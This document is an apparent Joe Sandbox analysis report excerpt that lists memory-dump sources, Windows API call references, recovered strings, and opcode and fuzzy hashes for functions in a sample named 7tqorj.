                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                    • String ID:
                                                    • API String ID: 1390108997-0
                                                    • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                    • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                    • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                    • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 3523768491-393685449
                                                    • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                    • Instruction ID: c406caa237195cd02fdade61d8adba87a26ef70a72da8dde0e696cf92646bfeb
                                                    • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                    • Instruction Fuzzy Hash: 39E19D72A0978A8AE7209B34D4A03BD37A0EF56B48F144275DE8D577A6DE38E582C704
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA58095CB
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA5809601
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA580962E
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA580963F
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA5809650
                                                    • SetLastError.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA580966B
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                    • Instruction ID: 6defa91378cbb318d49f55524743880815f009afa88f8b938dfd1aecdfce6ed8
                                                    • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                    • Instruction Fuzzy Hash: E1113B60B0F68A46FA54B33155713396252AF4AFB0F4447B5E83E077DBDE2CE8418708
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                    • String ID:
                                                    • API String ID: 3326452711-0
                                                    • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                    • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                    • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                    • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                    • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                    • API String ID: 2984211723-1229430080
                                                    • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                    • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                    • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                    • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                    • Instruction ID: 3362112d1b1b1ed8b731dcb36f440aaf36fd999ac62bda9c610862d6e1523bb3
                                                    • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                    • Instruction Fuzzy Hash: 0EF06265B1A60A81FB108B35E4647796320BF86F62F540375DA6F867E5CF2CD049C344
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                    • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                    • ExitProcess.KERNEL32 ref: 0000000140008545
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: AddressExitHandleModuleProcProcess
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 75539706-1276376045
                                                    • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                    • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                    • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                    • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                    • Instruction ID: 0e1b0a7ee760a2d831def7fc33a6e334971ebf660c511ea3328cda02516edaba
                                                    • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                    • Instruction Fuzzy Hash: 98B1D222B4BA4A81EA65DB71946073C6390EF56F84F0986B5DE4D077A7DF3CE4428348
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: FileInfoSleepStartupType
                                                    • String ID:
                                                    • API String ID: 1527402494-0
                                                    • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                    • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                    • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                    • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 3078728599-0
                                                    • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                    • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                    • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                    • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                    • String ID:
                                                    • API String ID: 1850339568-0
                                                    • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                    • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                    • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                    • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                    • Instruction ID: 18e2c2a7e58639a5acb22b9e2da42323282659d41fe44a4f721ebc54c64ae0ee
                                                    • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                    • Instruction Fuzzy Hash: A911C832F49A0F42F7546379E57537910416F9BB70F1487B4E5AE063DF9E2C6841CA09
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FFDA580766F,?,?,00000000,00007FFDA580790A,?,?,?,?,?,00007FFDA5807896), ref: 00007FFDA58096A3
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA580766F,?,?,00000000,00007FFDA580790A,?,?,?,?,?,00007FFDA5807896), ref: 00007FFDA58096C2
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA580766F,?,?,00000000,00007FFDA580790A,?,?,?,?,?,00007FFDA5807896), ref: 00007FFDA58096EA
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA580766F,?,?,00000000,00007FFDA580790A,?,?,?,?,?,00007FFDA5807896), ref: 00007FFDA58096FB
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA580766F,?,?,00000000,00007FFDA580790A,?,?,?,?,?,00007FFDA5807896), ref: 00007FFDA580970C
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                    • Instruction ID: 25abc415800ce9e55acc0cbf519ca6c8c4b27267bceb58e9f9c4ccf1748d3125
                                                    • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                    • Instruction Fuzzy Hash: 42113DA0B0F29E45FA587B35657137962919F46BF0F5443B4E83E077DBEE2CE8418608
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                    • Instruction ID: 6203c6c73b1ed6350d2af1256c71950b7fa642fcd979c6a3877de6b6f9453246
                                                    • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                    • Instruction Fuzzy Hash: 5E11A8A0B0F24F4AFA68B776547237952819F47B70E5407B4D93E0A7EBED2CB8418609
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                    • Instruction ID: eb435cbddcc5b5d928c3f6b7330923de9e42251676578deb56d27cda76a029c2
                                                    • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                    • Instruction Fuzzy Hash: 7C919D72B097898AE710CB74E4903AD7BB0FF56B88F10426AEA4D17B56DF38D195CB04
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 2395640692-1018135373
                                                    • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                    • Instruction ID: 9674ff227cb1c85f7b42a119b24891a68d27336af04a769e0d3243f98b50ed33
                                                    • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                    • Instruction Fuzzy Hash: 8851C132B0A64A8AEB149B39E46477C7391EF42F98F108270DA4A83786DF7DE941C704
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                    • Instruction ID: 845f3493bcaf7727eb828a4714818bab681142fc865c178aedb351ad374d45e1
                                                    • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                    • Instruction Fuzzy Hash: 8A518F32B0938A8AEB749B3194A436877A0EF66F84F144275DA8D47B96CF3CF451C718
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                    • Instruction ID: 0eabc7f6b573155b7cb7b8caad75351632a4381d8a036f9baf42b61df5a324c1
                                                    • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                    • Instruction Fuzzy Hash: B661A172A09BC985EB709B25E4503AAB7A0FF96B84F044325EB9D07B56CF7CD190CB04
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleLoadModuleProc
                                                    • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                    • API String ID: 3055805555-3733552308
                                                    • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                    • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                    • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                    • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentSizeWorking
                                                    • String ID: Shrinking process size
                                                    • API String ID: 2122760700-652428428
                                                    • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                    • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                    • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
